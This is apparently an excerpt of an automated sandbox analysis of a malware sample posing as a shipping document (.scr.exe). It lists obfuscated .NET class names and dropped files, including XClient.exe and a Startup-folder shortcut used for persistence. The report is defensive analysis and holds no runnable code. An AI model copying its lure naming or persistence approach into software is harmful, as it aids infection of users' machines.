Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack, y42W1bnvO6P0K.cs	High entropy of concatenated method names: 'LG61tF1NXxMw5', 'oGvBieVy94qbk', 'YRTDDNA0tkzMF', 'VhxySITiopS46', 'qjbfovDtQWz1b', 'kLPAgXYZstRMB', 'hjXpfk41rTAw1', 'zs2SZYN7C9FhZ', 'zFQIATYwwABMt', 'qai42JONF5klU'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack, 4QBfyOitSe4w0.cs	High entropy of concatenated method names: 'wcUZ2mvylwf7l', 'WtIrNy0hVmv60', 'JJgHyUlgPqlHQ', 'oHuREPEY4JElU', '_6vBzT4Nf8lYoy', 'Pai19egUGSisn', 'R5KRLNkgechqT', 'BCrPs0JGWRM5b', 'aoGqSGI44Uvct', 'irOTow0Wq5kJo'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack, yI26puFLQ4OeW.cs	High entropy of concatenated method names: 'RPwrCFQWFVe3z', 'ykPv5m8mGukHt', 'rl3v1HQ21t3Ss', 'p5lTD1bRQsSns', 'N73EDMwGLrsYV', '_7giKgaxCmtum3', 'zR4TMA5bTqEsF', 'lNVI49QJGetLk', 'ivrYT9hUulqbg', 'G1GjbMsl7I84P'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.8d20000.5.raw.unpack, NAJ7s7Uw2SoH4wv6j5.cs	High entropy of concatenated method names: 'gS27VEVove', 'JwS7jMYPgT', 'jDG7o84df9', 'wkc7q0ZsKW', 'zJd7POilHS', 'NuV7NLvZB9', 's4j7KRsCt7', 'yWL74oLDB0', 'vmJ7biDfNm', 'Bqn7gDQ7TK'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.8d20000.5.raw.unpack, crjZejZ17fOgQiWqyV.cs	High entropy of concatenated method names: 'VWFL0fW1XD', 'sRZLXp543k', 'TpOLOwD0sn', 'TI7Lc99QeN', 'tlxLuYMgYo', 'LykLpuikWB', 'ewoLQyfx91', 'b0uLlOE7AK', 'gklLkNXUYR', 'aPFLmV5nCn'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.8d20000.5.raw.unpack, x8kmF9didSRhWBKy0in.cs	High entropy of concatenated method names: 'XbwBDHWwm5', 'aDsB1eo2lE', 'QUnBhguqOL', 'gl3BFhSMEp', 'GSHBIt7lQb', 'kFABYIMIi5', 'FHaBRM7mAJ', 'SdBB0CbfWf', 'pgYBXE1Bsg', 'RWvBacVuPA'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.8d20000.5.raw.unpack, seF2nS8mYgQPw7gqtN.cs	High entropy of concatenated method names: 'e1mAU4BaGQ', 'SD8AEM9r3D', 'E6T7i4qRON', 'Y0h7dUbeUl', 'FWrAmWEu4P', 'ynvAMIKGju', 'IlxAZmMtRM', 'yWEArnG8By', 'ILGA51qmwg', 'njiAe2niBp'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.8d20000.5.raw.unpack, tk7eFSElmxiFYOIr62.cs	High entropy of concatenated method names: 'scFBdfsuiX', 'oeDB2H3lSB', 'Ku8BncCyIv', 'dMGBV7aDkJ', 'wXnBj2Y4k2', 'DZ8BqGk6fg', 'b2qBPRKCTb', 'sfO7Cy32tN', 'kOa7Uoi5m7', 'c5G7sUe10T'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.8d20000.5.raw.unpack, J5o4JL0ENemqPugCy1.cs	High entropy of concatenated method names: 'msKjr4frvg', 'Pelj5ZtP4w', 'yZ7je3Pwxt', 'GULj6RRBLB', 'lXyjfweZ8y', 'sWqj8XqU8F', 'bg4jClKOE0', 'ckKjUe0qpt', 'z7MjsJ9NwZ', 'iaZjEjHDpH'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.8d20000.5.raw.unpack, OZHkEFrQRFn3gmFIgR.cs	High entropy of concatenated method names: 'KpG3kvmDKj', 'EVA3MmvI50', 'HFN3rsgpBj', 'OW135XcPAK', 'ocK3c2NbNg', 'dqx3TW3t5B', 'Ibi3uK9gFT', 'zWO3ptKgf9', 'whR3SOiuaO', 'Tue3QsTmx0'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.8d20000.5.raw.unpack, GZPwOSd2anugPF73bJy.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NunyrM1CpR', 'qL3y53s5K5', 'HplyeO5QbU', 'oWCy6NZKFo', 'CLyyf25xPK', 'Cw6y8tC6i6', 'C2dyC9L0fX'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.8d20000.5.raw.unpack, YUEbLZsZ2Sra2NBB7X.cs	High entropy of concatenated method names: 'hhD7OxtUgk', 'XJH7cFvssX', 'rAF7TnoBkT', 'ySR7u9ErDZ', 'iF97rUD9QN', 'p3X7pPOQ9K', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.8d20000.5.raw.unpack, We4yQo6DX3r40vFw5r.cs	High entropy of concatenated method names: 'Gx1AbGKGGO', 'hxiAgq89v7', 'ToString', 'WOdAVMtXgw', 'QajAjfLFo3', 'SNMAopXLD2', 'LiIAq5HRTp', 'UJUAPCDy25', 'C3qANFl31E', 'bFBAKn60K6'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.8d20000.5.raw.unpack, YDMP6WKRt6Ugl0371L.cs	High entropy of concatenated method names: 'smG2GutHY2', 'gQu2VPHoud', 'JIN2j8I0dU', 'iuS2oZjXW0', 'pLl2q40HQg', 'w1Q2PCjmOG', 'mQF2NKeirm', 'Bsp2KIOtqm', 'lZa24GFF2P', 'oBx2bZ3tB5'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.8d20000.5.raw.unpack, Stj9yieKsnnj4Xevau.cs	High entropy of concatenated method names: 'ToString', 'yb8tm4nfKu', 'ilmtcVtSav', 'QuytTdyEUF', 'iMbtuWq2jF', 'F6qtpj3spc', 'CuktSCvUQq', 'Bd8tQuTXbB', 'kmMtl53WLb', 'YrntxXOcc7'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.8d20000.5.raw.unpack, EwE7DknQVZq6Qfg03h.cs	High entropy of concatenated method names: 'URpdN5o4JL', 'YNedKmqPug', 'pjgdbREvar', 'JD9dgX5teU', 'uhod3IvtVh', 'I64dta2nfM', 'VgiqwdaCPstikvJdLy', 'XtdyYqshtcrGfAcOfy', 'kKPddGoZuu', 'h3kd2ZZouA'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.8d20000.5.raw.unpack, CTq67NxffZ5PSQfod1.cs	High entropy of concatenated method names: 'EA1NDQuiMJ', 'w91N1OLca7', 'DYgNhN21GC', 'vExNFU6ggj', 'qrBNI6VjKh', 'bP3NYYR7C6', 'Yu2NRbUYTN', 'sfEN0yUJ67', 'chLNX5bcPA', 'cpINaMHdDR'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.8d20000.5.raw.unpack, uk8LytXjgREvaruD9X.cs	High entropy of concatenated method names: 'ot1oFOd1dk', 'r5foYBYISF', 'fG3o0UhvSJ', 'JwpoX20dRm', 'F9ho3YpbIP', 'X1Ootp4pd5', 'nWLoARnrx4', 'U3po7jcPL2', 'N8voBfLQDX', 'Ai3oyj37Ca'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.8d20000.5.raw.unpack, v7HrGpjK5bgMXw9Ba0.cs	High entropy of concatenated method names: 'Dispose', 'jEsdsWhJDn', 'MU1wcm08Ha', 'vp366OJsPl', 'ukAdEJ7s7w', 'dSodzH4wv6', 'ProcessDialogKey', 'g5EwiUEbLZ', 'P2Swdra2NB', 'r7Xwwyk7eF'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.8d20000.5.raw.unpack, qEVWs0Qy0o6fd3t441.cs	High entropy of concatenated method names: 'JDlNVbTgUL', 'JQrNo8ggO7', 'O76NPjHSDm', 'DdLPE41XOb', 'bgaPzPNJ4j', 'yLgNirbJnj', 'cGANdXPemy', 'lpENwP2B5V', 'LQnN2qxUAk', 'fmZNnth6pL'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.8d20000.5.raw.unpack, fuNwWooAn7jcS70K43.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NtUwsXyOKk', 'Y26wECoaD4', 'cN9wzbXSys', 'EdB2iQoiOC', 'AZg2di3mUr', 'mZm2wTAjMo', 'wkg22Kp8VI', 'qICcRGjuxjIJW9ioId5'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.8d20000.5.raw.unpack, pVhu64Oa2nfMhPyY63.cs	High entropy of concatenated method names: 'xZBPGCuiyH', 'V26PjiI5KW', 'ADRPqroEpi', 'AaRPN4mp2V', 'N5YPKKBNYj', 'dUGqf25Ary', 'qTCq8mi8aX', 'XBBqC1SuiK', 'cDjqUJy57H', 'HEgqsY7hUy'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.8d20000.5.raw.unpack, xj5QWywXFCIEkp4owF.cs	High entropy of concatenated method names: 'hGTh1JAIG', 'k09F825cC', 'SRLYu0v0s', 'yuSRC42ll', 'JDxX81x5B', 'SC1a9fLhJ', 'lZwBplAExbWvbe1RHW', 'QJUfpswkmOApkS1gR5', 'AJQ73Rm6T', 'bwCyoepNt'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4dc64e8.2.raw.unpack, NAJ7s7Uw2SoH4wv6j5.cs	High entropy of concatenated method names: 'gS27VEVove', 'JwS7jMYPgT', 'jDG7o84df9', 'wkc7q0ZsKW', 'zJd7POilHS', 'NuV7NLvZB9', 's4j7KRsCt7', 'yWL74oLDB0', 'vmJ7biDfNm', 'Bqn7gDQ7TK'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4dc64e8.2.raw.unpack, crjZejZ17fOgQiWqyV.cs	High entropy of concatenated method names: 'VWFL0fW1XD', 'sRZLXp543k', 'TpOLOwD0sn', 'TI7Lc99QeN', 'tlxLuYMgYo', 'LykLpuikWB', 'ewoLQyfx91', 'b0uLlOE7AK', 'gklLkNXUYR', 'aPFLmV5nCn'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4dc64e8.2.raw.unpack, x8kmF9didSRhWBKy0in.cs	High entropy of concatenated method names: 'XbwBDHWwm5', 'aDsB1eo2lE', 'QUnBhguqOL', 'gl3BFhSMEp', 'GSHBIt7lQb', 'kFABYIMIi5', 'FHaBRM7mAJ', 'SdBB0CbfWf', 'pgYBXE1Bsg', 'RWvBacVuPA'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4dc64e8.2.raw.unpack, seF2nS8mYgQPw7gqtN.cs	High entropy of concatenated method names: 'e1mAU4BaGQ', 'SD8AEM9r3D', 'E6T7i4qRON', 'Y0h7dUbeUl', 'FWrAmWEu4P', 'ynvAMIKGju', 'IlxAZmMtRM', 'yWEArnG8By', 'ILGA51qmwg', 'njiAe2niBp'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4dc64e8.2.raw.unpack, tk7eFSElmxiFYOIr62.cs	High entropy of concatenated method names: 'scFBdfsuiX', 'oeDB2H3lSB', 'Ku8BncCyIv', 'dMGBV7aDkJ', 'wXnBj2Y4k2', 'DZ8BqGk6fg', 'b2qBPRKCTb', 'sfO7Cy32tN', 'kOa7Uoi5m7', 'c5G7sUe10T'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4dc64e8.2.raw.unpack, J5o4JL0ENemqPugCy1.cs	High entropy of concatenated method names: 'msKjr4frvg', 'Pelj5ZtP4w', 'yZ7je3Pwxt', 'GULj6RRBLB', 'lXyjfweZ8y', 'sWqj8XqU8F', 'bg4jClKOE0', 'ckKjUe0qpt', 'z7MjsJ9NwZ', 'iaZjEjHDpH'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4dc64e8.2.raw.unpack, OZHkEFrQRFn3gmFIgR.cs	High entropy of concatenated method names: 'KpG3kvmDKj', 'EVA3MmvI50', 'HFN3rsgpBj', 'OW135XcPAK', 'ocK3c2NbNg', 'dqx3TW3t5B', 'Ibi3uK9gFT', 'zWO3ptKgf9', 'whR3SOiuaO', 'Tue3QsTmx0'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4dc64e8.2.raw.unpack, GZPwOSd2anugPF73bJy.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NunyrM1CpR', 'qL3y53s5K5', 'HplyeO5QbU', 'oWCy6NZKFo', 'CLyyf25xPK', 'Cw6y8tC6i6', 'C2dyC9L0fX'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4dc64e8.2.raw.unpack, YUEbLZsZ2Sra2NBB7X.cs	High entropy of concatenated method names: 'hhD7OxtUgk', 'XJH7cFvssX', 'rAF7TnoBkT', 'ySR7u9ErDZ', 'iF97rUD9QN', 'p3X7pPOQ9K', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4dc64e8.2.raw.unpack, We4yQo6DX3r40vFw5r.cs	High entropy of concatenated method names: 'Gx1AbGKGGO', 'hxiAgq89v7', 'ToString', 'WOdAVMtXgw', 'QajAjfLFo3', 'SNMAopXLD2', 'LiIAq5HRTp', 'UJUAPCDy25', 'C3qANFl31E', 'bFBAKn60K6'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4dc64e8.2.raw.unpack, YDMP6WKRt6Ugl0371L.cs	High entropy of concatenated method names: 'smG2GutHY2', 'gQu2VPHoud', 'JIN2j8I0dU', 'iuS2oZjXW0', 'pLl2q40HQg', 'w1Q2PCjmOG', 'mQF2NKeirm', 'Bsp2KIOtqm', 'lZa24GFF2P', 'oBx2bZ3tB5'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4dc64e8.2.raw.unpack, Stj9yieKsnnj4Xevau.cs	High entropy of concatenated method names: 'ToString', 'yb8tm4nfKu', 'ilmtcVtSav', 'QuytTdyEUF', 'iMbtuWq2jF', 'F6qtpj3spc', 'CuktSCvUQq', 'Bd8tQuTXbB', 'kmMtl53WLb', 'YrntxXOcc7'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4dc64e8.2.raw.unpack, EwE7DknQVZq6Qfg03h.cs	High entropy of concatenated method names: 'URpdN5o4JL', 'YNedKmqPug', 'pjgdbREvar', 'JD9dgX5teU', 'uhod3IvtVh', 'I64dta2nfM', 'VgiqwdaCPstikvJdLy', 'XtdyYqshtcrGfAcOfy', 'kKPddGoZuu', 'h3kd2ZZouA'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4dc64e8.2.raw.unpack, CTq67NxffZ5PSQfod1.cs	High entropy of concatenated method names: 'EA1NDQuiMJ', 'w91N1OLca7', 'DYgNhN21GC', 'vExNFU6ggj', 'qrBNI6VjKh', 'bP3NYYR7C6', 'Yu2NRbUYTN', 'sfEN0yUJ67', 'chLNX5bcPA', 'cpINaMHdDR'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4dc64e8.2.raw.unpack, uk8LytXjgREvaruD9X.cs	High entropy of concatenated method names: 'ot1oFOd1dk', 'r5foYBYISF', 'fG3o0UhvSJ', 'JwpoX20dRm', 'F9ho3YpbIP', 'X1Ootp4pd5', 'nWLoARnrx4', 'U3po7jcPL2', 'N8voBfLQDX', 'Ai3oyj37Ca'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4dc64e8.2.raw.unpack, v7HrGpjK5bgMXw9Ba0.cs	High entropy of concatenated method names: 'Dispose', 'jEsdsWhJDn', 'MU1wcm08Ha', 'vp366OJsPl', 'ukAdEJ7s7w', 'dSodzH4wv6', 'ProcessDialogKey', 'g5EwiUEbLZ', 'P2Swdra2NB', 'r7Xwwyk7eF'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4dc64e8.2.raw.unpack, qEVWs0Qy0o6fd3t441.cs	High entropy of concatenated method names: 'JDlNVbTgUL', 'JQrNo8ggO7', 'O76NPjHSDm', 'DdLPE41XOb', 'bgaPzPNJ4j', 'yLgNirbJnj', 'cGANdXPemy', 'lpENwP2B5V', 'LQnN2qxUAk', 'fmZNnth6pL'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4dc64e8.2.raw.unpack, fuNwWooAn7jcS70K43.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NtUwsXyOKk', 'Y26wECoaD4', 'cN9wzbXSys', 'EdB2iQoiOC', 'AZg2di3mUr', 'mZm2wTAjMo', 'wkg22Kp8VI', 'qICcRGjuxjIJW9ioId5'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4dc64e8.2.raw.unpack, pVhu64Oa2nfMhPyY63.cs	High entropy of concatenated method names: 'xZBPGCuiyH', 'V26PjiI5KW', 'ADRPqroEpi', 'AaRPN4mp2V', 'N5YPKKBNYj', 'dUGqf25Ary', 'qTCq8mi8aX', 'XBBqC1SuiK', 'cDjqUJy57H', 'HEgqsY7hUy'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4dc64e8.2.raw.unpack, xj5QWywXFCIEkp4owF.cs	High entropy of concatenated method names: 'hGTh1JAIG', 'k09F825cC', 'SRLYu0v0s', 'yuSRC42ll', 'JDxX81x5B', 'SC1a9fLhJ', 'lZwBplAExbWvbe1RHW', 'QJUfpswkmOApkS1gR5', 'AJQ73Rm6T', 'bwCyoepNt'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.raw.unpack, OEGyOZzp9CU9Z.cs	High entropy of concatenated method names: 'QYSru9RU5dJWd', 'oi9Msqd9lmqFp', 'Gh7hF3Ceyz4jK', 'x2Kcz0n4msm1l2xM', '_4hDI5T8H5DCOIm19', 'T6aFt50BZla82ZA2', 'zpcOiMJTAlF4Htxi', 'TMFXXcHHzUU18I1r', 'ZSkwZRotVkMfXhhu', 'Um2YTXt47I4LIxgc'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.raw.unpack, v5gt0V01k1MSsC0vwoxxBSwsEW4T1eqJw046P2ak3r4M2UHQ1RfEfyXqwlgDqRqjrSOTYe7.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'QTea7y2A8yGbO3jMXxuYC9YMcx5anBR', 'ZTIL5yWBKqapf9Byr2X2ov4nJgGIqjf', 'WHkIaWdsBqOvjqgK5gnz3Hq7FGRo7av', 'ksvOYOxtyeEJgsYuEk2j6FJUFQEL7jb'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.raw.unpack, xEwUvc4BlwXCJ.cs	High entropy of concatenated method names: 'upuCmD95kpAQn', 'y64QqzLLzgvYy', 'nHNLF6ETZc4pz', 'wFe23vyXZnI9p', 'oPyUSoKLxc3MJ', 'j0yacKOMxpzCw3ZgwzP7SYa9OQxk42U', 'sG0Gu7E9uPceY4JkCHFeLM6rppnIbSk', 'Ic69UCn21qS8jQPeUpzcxe67X8Wwo7C', 'TVdrYhGtHgnmKaKEGnnQHc1AVeCLwz9', 'h9lFeGqDok6PiuQlRtN7JIQA7sN9FeZ'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.raw.unpack, qMGvLJvouSdkL.cs	High entropy of concatenated method names: 'wAkM01TBZTMeC', 'ciAT4tkkLZ8RM', 'kyv1OiOaRjUOS', 'Is1Vu2C8gzfuWAcZ', 'ZrXVwJq1NPBYst66', 'YSiZ9OqRAn5DEoap', 'kpqsU8I4EmsXem6T', 'Y40LWH71GiExNonP', 'wlqe8L0mqhORb3Xh', 'cBzGfHA7YZurGUjI'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.raw.unpack, 3QiiXqkghrMk1.cs	High entropy of concatenated method names: '_7TDRTDNWODVx9', 'bjpklCnAU25Ps', '_7whWzOffgktu7', 'H6OjpWJSuZpR7', 'LgXlVehbtF6PL', 'VPnNUxfUUOfKi', 'kVcqKyJkqeEYF', 'I9f9xqzndWbJy', 'Yh4ih3UMSubwZ', '_99oZuJy83I8YX'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.raw.unpack, y42W1bnvO6P0K.cs	High entropy of concatenated method names: 'LG61tF1NXxMw5', 'oGvBieVy94qbk', 'YRTDDNA0tkzMF', 'VhxySITiopS46', 'qjbfovDtQWz1b', 'kLPAgXYZstRMB', 'hjXpfk41rTAw1', 'zs2SZYN7C9FhZ', 'zFQIATYwwABMt', 'qai42JONF5klU'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.raw.unpack, 4QBfyOitSe4w0.cs	High entropy of concatenated method names: 'wcUZ2mvylwf7l', 'WtIrNy0hVmv60', 'JJgHyUlgPqlHQ', 'oHuREPEY4JElU', '_6vBzT4Nf8lYoy', 'Pai19egUGSisn', 'R5KRLNkgechqT', 'BCrPs0JGWRM5b', 'aoGqSGI44Uvct', 'irOTow0Wq5kJo'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.raw.unpack, yI26puFLQ4OeW.cs	High entropy of concatenated method names: 'RPwrCFQWFVe3z', 'ykPv5m8mGukHt', 'rl3v1HQ21t3Ss', 'p5lTD1bRQsSns', 'N73EDMwGLrsYV', '_7giKgaxCmtum3', 'zR4TMA5bTqEsF', 'lNVI49QJGetLk', 'ivrYT9hUulqbg', 'G1GjbMsl7I84P'

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	File created: \packiing-#u5ee3#u5dde#u7acb#u5f97 - ever atop v.1319-008w khh-rtm so a268.scr.exe
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	File created: \packiing-#u5ee3#u5dde#u7acb#u5f97 - ever atop v.1319-008w khh-rtm so a268.scr.exe
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	File created: \packiing-#u5ee3#u5dde#u7acb#u5f97 - ever atop v.1319-008w khh-rtm so a268.scr.exe
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	File created: \packiing-#u5ee3#u5dde#u7acb#u5f97 - ever atop v.1319-008w khh-rtm so a268.scr.exe
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	File created: \packiing-#u5ee3#u5dde#u7acb#u5f97 - ever atop v.1319-008w khh-rtm so a268.scr.exe
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	File created: \packiing-#u5ee3#u5dde#u7acb#u5f97 - ever atop v.1319-008w khh-rtm so a268.scr.exe	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	File created: \packiing-#u5ee3#u5dde#u7acb#u5f97 - ever atop v.1319-008w khh-rtm so a268.scr.exe	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	File created: \packiing-#u5ee3#u5dde#u7acb#u5f97 - ever atop v.1319-008w khh-rtm so a268.scr.exe	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	File created: \packiing-#u5ee3#u5dde#u7acb#u5f97 - ever atop v.1319-008w khh-rtm so a268.scr.exe	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	File created: \packiing-#u5ee3#u5dde#u7acb#u5f97 - ever atop v.1319-008w khh-rtm so a268.scr.exe	Jump to behavior

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

File created: C:\Users\user\AppData\Roaming\XClient.exe

Jump to dropped file

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Jump to behavior

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
